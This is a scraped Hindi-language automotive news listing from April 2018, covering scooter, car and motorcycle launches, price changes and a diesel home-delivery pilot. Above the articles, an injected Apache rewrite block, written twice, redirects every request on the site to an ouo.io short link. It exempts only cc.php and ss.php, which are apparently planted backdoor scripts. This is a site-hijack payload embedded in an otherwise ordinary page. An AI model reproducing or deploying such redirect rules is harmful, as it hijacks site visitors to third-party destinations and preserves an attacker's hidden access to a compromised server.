
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
नई दिल्ली। इंडिया यामाहा मोटर ने कल अपने स्टाइलिस स्कूटर फसीनो को नए रंगों में लॉन्च करने की घोषणा कर दी। इस 110सीसी स्कूटर में नए ग्राफिक्स भी दिए गए हैं। अब यह स्कूटर पांच ड्यूल टोन और दो सिंगल टोन शेड्स में अवेलेबल होगा। स्कूटर की नई दिल्ली में एक्स शोरूम कीमत 54,593 रुपए है। कलर चॉइस के लिए अलग से कोई पैसे नहीं लिए जाएंगे। ड्यूल टोन आॅप्शंस की बात करें तो गोल्ड, ग्रे, क्यान और वाइट कलर्स शामिल हैं। ये सभी काले रंग के कॉम्बिनेशन के साथ अवेलेबल है। जबकि सिंगल टोन आॅप्शंस में ब्लू और क्यान कलर्स हैं। ये सभी कलर आॅप्शंस प्रीमियम मैटे फिनिश और ड्यूल टेक्सचर सीट कवर के साथ अवेलेबल हैं। यामाह मोटर इंडिया सेल्स की सेल्स ऐंड मार्केटिंग विंग के सीनियर वाइस प्रेजिडेंट रॉय कुरियन के मुताबिक, यामाहा अपनी प्रॉडक्ट लाइन को एक्साइटिंग अपग्रेड्स के साथ मार्केट में लाने को लेकर प्रतिबद्ध है। फसीनो तकनीक और स्टाइल, दोनों पैमानों पर खरा उतरने वाला स्कूटर है। यामाहा फसीनो स्कूटर में कोई मैकेनिकल बदलाव नहीं किया गया है। नए कलर मॉडल्स में भी एयर कूल्ड, 4 स्ट्रोक वाला 113सीसी इंजन दिया जाएगा। इसमें जापानी कंपनी यामाहा की पेटेंटेड 'ब्लू कोर' तकनीक होगी। इसकी मदद से यह इंजन 66 किलोमीटर प्रति लीटर का माइलेज दे सकता है। इसका कार्ब्युरेटेड वर्जन 7.1PS का पावर और 8.1 न्यूटन मीटर टॉर्क जेनरेट करता है। पावर पहियों तक पहुंचाने में सीवीटी आॅटोमैटिक गियरबॉक्स मदद करता है। इसमें टेलिस्कोपिक फॉर्क्स, ट्यूबलेस टायर्स और दोनों पहियों में ड्रम ब्रेक्स दिए गए हैं। इस स्कूटर का वजन 103 किलोग्राम के आसपास है।
08 Apr, 2018
आगे पढ़ऐनई दिल्ली। यूरोप में स्विफ्ट का जो हाइब्रिड वर्जन है वो 1.2 लीटर और 1.0 लीटर पेट्रोल इंजन के साथ उपलब्ध है। लेकिन अब जल्द ही मारुति सुजुकी भारत में डीजल वैरियंट के साथ स्विफ्ट कार का हाइव्रिड ला सकती है। मारुति सुजुकी भारत की सबसे बड़ी कार निर्माता कंपनी है। मारुति ने हाल ही में भारत में स्विफ्ट का हैचबैक वर्जन पेश किया है। कंपनी के मुताबिक हैचबैक वर्जन बेस्ट सेलर रहा है। मारुति ने अपने हैचबैक वर्जन को दो इंजन ऑप्शन, पेट्रोल और डीजल में पेश किया है। मारुति सुजुकी इंडिया के एक्जीक्यूटिव डायरेक्टर (इंजीनियरिंग) सीवी रमन का कहना है कि हम भारत में कारों का इलेक्ट्रिफिकेसन की दिशा में बढ़ रहे हैं। हमारा मानना है कि कारों का हाइब्रिडाइजेशन जरूरी है। इसके लिए हम सरकार के साथ हैं। अभी जो नई स्विफ्ट इस्तेमाल की जाती है इसमें 1.3 लीटर मल्टी-जेट डीजल इंजन दिया गया है जो कि कि Fiat ने बनाया है। यही इंजन Ertiga, Ciaz और S-Cross कारों में भी मौजूद है। ये तीनों मॉडल्स डीजल हाइब्रिड ऑप्शन के साथ स्मार्ट हाइब्रिड विकल्स के तहत भारतीय मार्केट के लिए विकल्प हैं। इन तीनों मॉडल्स में नॉन-हाइब्रिड डीजल वर्जन नहीं है। इसका मतलब है कि ये तीनों मॉडल्स डीजल इंजन के साथ हाइब्रिड फॉर्मेट में हैं। दावा किया जा रहा है कि स्विफ्ट का का पेट्रोल हाइब्रिड इंजन एक लीटर में 32 किलोमीटर का माइलेज देगा। यह डीजल इंजन द्वारा दिए जाने वाले माइलेज से ज्यादा है। डीजल वैरियंट 28.4 किलोमीटर प्रति लीटर का माइलेज देता है और पेट्रोल वैरियंट एक लीटर में 22 किलोमीटर प्रति घंटे का माइलेज देता है।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। लग्जरी कार बनाने वाली जर्मनी की दिग्गज कंपनी मर्सिडीज बेंज ने भारत में S-Class की नई रेंज लॉन्च की है। डीजल इंजन वाली S350d की कीमत 1.33 करोड़ रुपये है। वहीं, पेट्रोल इंजन वाली S450 वैरिएंट की कीमत 1.37 करोड़ रुपये है। ये एक्स-शोरूम प्राइस है। कंपनी का कहना है कि डीजल मॉडल BS-VI एमिशन नॉर्म्स को पूरा करने वाला है और यह ऐसा करने वाली भारत की पहली कार है। रोचक बात यह है कि BS-VI मानक को पूरा करने वाला इंजन BS-IV फ्यूल में भी चलने में सक्षम है। मौजूदा समय में भारत में BS-IV फ्यूल ही चलन में है। मर्सिडीज बेंज S-Class S350d में कंपनी की तरफ से डिजाइन किया गया सबसे पावरफुल पैसेंजर कार डीजल इंजन है। यह एक इन-लाइन सिक्स सिलेंडर टर्बोचार्ज्ड इंजन है, जो कि 286hp पावर जेनरेट करता है। पिछले मॉडल के मुकाबले इस मॉडल का पावर आउटपुट काफी ज्यादा है। कंपनी का दावा है कि पिछले मॉडल के मुकाबले इस मॉडल में 6 फीसदी कम फ्यूल की खपत होती है। वहीं, S-Class S540 वैरिएंट में V6 ट्विन टर्बोचार्ज्ड इंजन का इस्तेमाल किया गया है, जो कि 367hp पावर जेनरेट करता है। जहां तक एक्सटीरियर की बात है तो नई S-Class में अब्स्ट्रक्शन सेंसर के साथ पैनोरैमिक स्लाइडिंग सनरूफ है। अगर इंटीरियर की बात की जाए तो नई मर्सिडीज में नया मल्टी फंक्शन स्टीयरिंग व्हील है, जिसमें कई टच कंट्रोल बटन हैं। यह कार 64 कलर एम्बिएंट लाइटिंग सिस्टम के साथ आ रही है। इस कार के फ्रंट और रियर सेंटर ऑर्मरेस्ट्स में वायरलेस मोबाइल चार्जिंग की व्यवस्था है। नई मर्सिडीज में एक्टिव ब्रेकिंग असिस्ट और ब्लाइंड स्पॉट असिस्ट है।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। BMW ने भारत में अपने चेन्नई प्लांट से BMW 6 सीरीज ग्रैन टूरिज्मो उतारी है। BMW की इस कार को हाल में ऑटो एक्सपो 2018 में लॉन्च किया गया था। 6 सीरीज ग्रैन टूरिज्मो को लोकली प्रॉड्यूस्ड पेट्रोल वैरिएंट (BMW 630i Gran Turismo Sport Line) में लॉन्च किया गया है। BMW 6 सीरीज ग्रैन टूरिज्मो की कीमत 58.90 लाख रुपये है। BMW ग्रुप प्लांट चेन्नई के मैनेजिंग डायरेक्टर जोशन स्टालकैंप ने बताया कि 'BMW 6 सीरीज ग्रैन टूरिज्मो न केवल यूनीक कॉन्सेप्ट है, बल्कि इसने एडवांस्ड इंजीनियरिंग, टेक्नोलॉजी और इनोवेशंस के जरिए एक अलग मुकाम बनाया है। इस कार को अब स्थानीय स्तर पर ही बनाया जा रहा है। यह एक अलग तरह का सेगमेंट बनाएगी और इंडियन लग्जरी कार सेगमेंट में नया बेंचमार्क तय करेगी।' BMW के चेन्नई प्लांट में BMW 3 सीरीज, BMW 3 सीरीज ग्रैन टूरिज्मो, BMW 5 सीरीज और BMW 7 सीरीज, BMW X1 और BMW X5 कारें बनती हैं। अब कंपनी के पोर्टफोलियो में BMW 6 सीरीज ग्रैन टूरिज्मो भी जुड़ गई है। कंपनी 2018 में MINI Countryman का लोकल प्रॉडक्शन भी शुरू करेगी। BMW 6 सीरीज ग्रैन टूरिज्मो अभी केवल पेट्रोल वैरिएंट में आ रही है। कंपनी 2018 के आखिर में इसका डीजल मॉडल लॉन्च करेगी। 6 सीरीज GT पेट्रोल में 2.0 लीटर फोर सिलेंडर इंजन है। यह इंजन 1,550-4,400 rpm पर 258hp का पावर और 400Nm का टॉर्क जेनरेट करता है। इसमें 8 स्पीड स्टेपट्रॉनिक स्पोर्ट ऑटोमैटिक ट्रांसमिशन है। BMW की यह कार 6.3 सेकेंड में 0-100 किलोमीटर की रफ्तार पकड़ लेती है। कार में लंबा बोनट है। इसका व्हीलबेस 3,070mm का है। कार में फ्रेमलेस विंडो के साथ डोर हैं। कार में 610 लीटर की बूट कैपेसिटी है, जो कि इसके पिछले मॉडल से 110 लीटर ज्यादा है। यह कार डिस्प्ले, नैविगेशन के साथ कंट्रोल सिस्टम, कम्युनिकेशंस और इंफोटेनमेंट फंक्शन से लैस है। कार में एयरबैग्स, एंटी-लॉक ब्रेकिंग सिस्टम (ABS), डायनामिक स्टेबिलिटी कंट्रोल जैसे फीचर हैं।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। Triumph मोटरसाइकिल ने अपनी सबसे अफॉर्डेबल क्रूजर बाइक Bonneville Speedmaster लॉन्च की है। भारत में इस बाइक की एक्स-शोरूम कीमत 11.11 लाख रुपये है। नई Speedmaster, Bonneville Bobber पर बेस्ड है जिसे Triumph ने पिछले साल इंडियन टू-व्हीलर मार्केट में लॉन्च किया था। इन दोनों ही मोटरसाइकिलों में Bonneville T120 का मोटर है। इस बाइक में 1,200CC का ट्विन सिलेंडर मोटर है। कंपनी के मुताबिक, यह मोटरसाइकिल खासतौर से उन लोगों के लिए है, जिन्हें क्लासिक Bonneville का डिजाइन तो पसंद है, लेकिन वह ज्यादा आराम चाहते हैं। Bonneville T120 के मुकाबले इस नई मोटरसाइकिल में क्रूजर जैसा सेटअप है। चूंकि, नई स्पीडमास्टर Bobber प्लेटफॉर्म पर बेस्ड है, ऐसे में यह बाइक उन लोगों को खासतौर से पसंद आएगी जो कि Bobber का हार्डटेल लुक चाहते हैं। Triumph की इस नई बाइक में पहला फ्यूल टैंक और क्लासिक हेडलैंप हैं, जो कि बॉबर की तरह ही हैं। यह बाइक 6,100 rpm पर 77PS और 4,000rpm पर 106 Nm का पीक टॉर्क जेनरेट करती है। इस बाइक में LED लाइट्स, ट्रैक्शन कंट्रोल, क्रूज कंट्रोल और मल्टीफंक्शनल इंस्ट्रूमेंट क्लस्टर डिस्प्ले जैसे फीचर हैं। यह सारे फीचर बाइक चलाने वाले का कंफर्ट काफी बढ़ा देते हैं। Triumph की इस बाइक में फ्यूल इंजेक्टेड इंजन है, जो कि सिक्स स्पीड ट्रांसमिशन के साथ है। इसके अलावा, इस बाइक में टॉर्क असिस्ट क्लच, राइड-बाय-वायर टेक्नोलॉजी और ड्यूल राइडिंग मोड्स जैसे फीचर हैं।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। रॉयल एनफील्ड ने भारत में अपनी दो दमदार मोटरसाइकिल लॉन्च की हैं। कंपनी ने रॉयल एनफील्ड थंडरबर्ड 350 एक्स और थंडरबर्ड 500X लॉन्च की हैं। Thunderbird 350X की दिल्ली में एक्स-शोरूम कीमत 1.56 लाख रुपए रखी गई है। जबकि Thunderbird 500X मोटरसाइकिल की कीमत 1.98 लाख रुपए रखी गई है। ये दोनों मोटरसाइकिल सबसे पहले उस वक्त चर्चा में आईं थी जब पिछले साल इनकी तस्वीरें लीक हुईं थी। आइये जानते हैं इन दोनों मोटरसाइकिल में क्या खास फीचर्स हैं। फोटो-ट्विटर Thunderbird 350X और 500X मोटरसाइकिल में शॉटर हैंडलबार, न्यू 9 स्पोक अलॉय व्हील, ट्यूबलैस टायर आदि फीचर्स दिए गए हैं। रॉयल एनफील्ड ने थंडरबर्ड 350 एक्स और थंडरबर्ड 500 एक्स को ब्लू, गेटवे ऑरेंज, रिवॉइंग रेड और Whimsical वाइट कलर में उतारा है। इन दोनों ही मोटरसाइकिल में LED डेटाइम रनिंग लैंप लगे हैं। इंजन थंडरबर्ड 350 एक्स बाइक में 346 सीसी का सिंगल-सिलेंडर इंजन लगा है जो कि 5,250 rpm पर 19.8 bhp की पावर और 4,000 rpm पर 28 Nm का टॉर्क जनरेट करता है। इसका इंजन फाइव-स्पीड गेयरबॉक्स से जुड़ा हुआ है। रॉयल एनफील्ड थंडरबर्ड 500 एक्स में 499 सीसी का सिंगल सिलेंडर इंजन दिया गया है जो कि 5,250 rpm पर 27.2 bhp की पावर और 4,000 rpm पर 41.3 Nm टॉर्क जनरेट करता है।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। गूगल की सेल्फ ड्राइविंग कार तकनीक पेश करने वाली कंपनी वीमो ने एक ऐसा वीडियो जारी किया है। जिसमें वीमो की सेल्फड्राइविंग कार को सड़कों पर चलते हुए देखा जा सकता है। कम्पनी 360 डिग्री विडियो के जरिए कार की सेल्फ ड्राइविंग तकनीक को पेश किया है। वीमो ने अपने ब्लॉग के जरिए जानकारी देते हुए बताया है कि इस कार ने पब्लिक रोड पर करीब 80 लाख किलोमीटर का सफर तय किया है। वीमो ने अपने ब्लॉग के जरिए करीब 3-मिनट, 36-सेकंड का वीडियो पोस्ट किया है। गूगल ने 2009 में वीमो सेल्फ ड्राइविंग कार प्रोजेक्ट की शुरुआत की थी। आज गूगल की वीमो पूरी दुनिया पहली फ्लीट है, जो पूरी तरह से सेल्फड्राइविंग तकनीक के साथ आम सड़कों पर चलने में सक्षम है। इस कार में कैमरे और सेंसर के जरिए आस-पास की गाड़ियों और ट्रैफिक सिग्नल देखने के लिए सक्षम बनाया गया है।
07 Apr, 2018
आगे पढ़ऐदोपहिया वाहन निर्माता कंपनी टीवीएस मोटर अपनी टीवीएस अपाचे RR 310 बाइक की कीमतों में बढ़ोतरी कर दी है। अब इस बाइक की शुरुआती कीमत 2,23,000 रुपए (एक्स शोरूम दिल्ली) हो गई है। इससे पहले इस बाइक की कीमत 2,15,000 रुपए (एक्स शोरूम दिल्ली) थी। वहीं कंपनी ने अपाचे RR 310 की कीमतें केरला राज्य में 1,99,999 रुपए (एक्स शोरूम कालीकट और कोचीन) में समान रखी गई है। माना जा रहा है कि अब TVS अपाचे RR 310 का मुकाबला KTM RC 390 से है। RC390 की कीमत 2,25,300 रुपए (एक्स शोरूम) है। जानिए क्या है खासियत इंजन: बाइक में 312.2cc सिंगल सिलेंडर DOHC मिल इंजन दिया है जो लिक्विड कूलिंग और फ्यूल इंजेक्शन के साथ आता है। यह इंजन 9,700 rpm पर 34PS की पावर और 7,700 rpm पर 27.3Nm का टॉर्क जनरेट करता है। इंजन 6 स्पीड ट्रांसमिशन से लैस है। डिजाइन: इस बाइक में bi-LED हेडलाइट्स, LED टेल लैंप और इंडीकेटर्स दिए गए हैं। बाइक में फुली डिजिटल और मल्टीफंक्शनल इंस्ट्रूमेंटेशन दिया गया है। फीचर्स: अपाचे RR 310 बाइक में 41mm अपसाइड डाउन कार्टेज-टाइप फ्रंट फॉर्क्स और रियर में KYB के साथ मोनोट्यूब फ्लोटिंग पिस्टन टेक्नोलॉजी वाले प्रि-लोड अडजस्टेबल मोनोशॉक दिए गए हैं। इसके अलावा बाइक के फ्रंट में 300mm और रियर में 240mm पेटल डिस्क के साथ डुअल चैनल ABS फीचर दिया गया है।
05 Apr, 2018
आगे पढ़ऐनई दिल्ली। इंडियन ऑयल कॉर्प (आईओसी) ने पुणे में डीजल की होम डिलीवरी की प्रायोगिक शुरुआत की है। कंपनी का लक्ष्य निकट भविष्य में इस सेवा को देश के अन्य हिस्सों में भी शुरू करने की है। कंपनी के चेयरमैन संजीव सिंह ने कहा कि कंपनी ने इसके लिए डीजल भरने वाली मशीन को एक ट्रक में लगाया है। यह मशीन उसी तरह की है जैसी पेट्रोल पंपों पर लगी होती हैं। ट्रक में एक टंकी भी लगी हुई है। इसके जरिए ही शहर में लोगों को डीजल की होम डिलीवरी की जाएगी। उन्होंने कहा कि पेट्रोलियम एवं विस्फोटक सुरक्षा संगठन (पेसो) से मंजूरी मिलने के बाद इस तरह की सेवा शुरू करने वाली हम पहली कंपनी हैं। कंपनी ने कहा कि अभी इसे प्रायोगिक आधार पर शुरू किया गया है। तीन महीने की परीक्षण अवधि में प्राप्त होने वाले अनुभव के आधार पर इसे अन्य शहरों में शुरू किया जाएगा। अब माना जा रहा है कि शीघ्र ही पेट्रोल की भी होम डिलीवरी होने वाली है। आईओसी के तरह सार्वजनिक खुदरा ईंधन विपणन कंपनियों हिंदुस्तान पेट्रोलियम कॉर्प लिमिटेड और भारत पेट्रोलियम कॉर्प लिमिटेड को भी होम डिलीवरी के लिए पेसो की मंजूरी मिली है। उन्हें प्रायोगिक परिचालन के लिए अलग-अलग क्षेत्र दिए गए हैं।
22 Mar, 2018
आगे पढ़ऐनई दिल्ली। कार कंपनियां चालू वित्त वर्ष के आखिरी महीने में अपनी इन्वेंटरी खाली करने के लिए चुनिंदा मॉडल्स डिस्काउंट दे रही है। आपको बता दें कि देश में कई लोग ऐसे हैं जो बड़ी यानी SUVs गाड़ियां खरीदना चाहते हैं। 2017 BMW X5 एक्सड्राइव 30d M स्पोर्ट: भारतीय बाजार में इस कार का मुकाबला मर्सिडीज GLE और ऑडी Q7 से है। इस कार में हाई-क्वालिटी इंटीरियर और परफॉर्मेंस दी गई है जिसकी वजह से यह और ज्यादा स्पोर्टी साबित होती है। इस कार के M स्पोर्ट वर्जन में ज्यादा स्पोर्टी और यूनीक एलॉय व्हील और बंपर डिजाइन दिया है, इसके बावजूद भी इस कार की बिक्री धीमी ही है। जर्मनी की लग्जरी कार निर्माता कंपनी बीएमडब्ल्यू एक्स5 रेंज के 2017 मॉडल्स पर 9 लाख रुपये तक का डिस्काउंट दे रही है। इस कार में 2993 CC वाला ट्विनपावर टर्बो इनलाइन 6-सिलेंडर इंजन दिया गया है। यह इंजन 258 bhp@4000 rpm की पावर और 560 Nm@1500-3000 rpm का टॉर्क जनरेट करता है। मर्सिडीज GLE: GLE भारतीय बाजार में मर्सिडीज की सबसे ज्यादा पॉपुलर एसयूवी है। बाजार में इसका मुकाबला BMW X5 और ऑडी Q7 से है। GLE SUV की सबसे बड़ी यूएसपी इसका प्लश राइड और स्मूथ डीजल इंजन है। इसमें कई तरह के लग्जरी फीचर्स शामिल किए गए हैं। कंपनी इस कार पर वेरिएंट के हिसाब से 3 लाख रुपये तक का डिस्काउंट दे रही है। इसमें लगा 2143 CC वाला इंजन 4-सिलेंडर डीजल इंजन दिया गया है। यह इंजन 204 bhp@3800 rpm की पावर और 500 Nm@1600-1800 rpm का टॉर्क जनरेट करता है।
16 Mar, 2018
आगे पढ़ऐ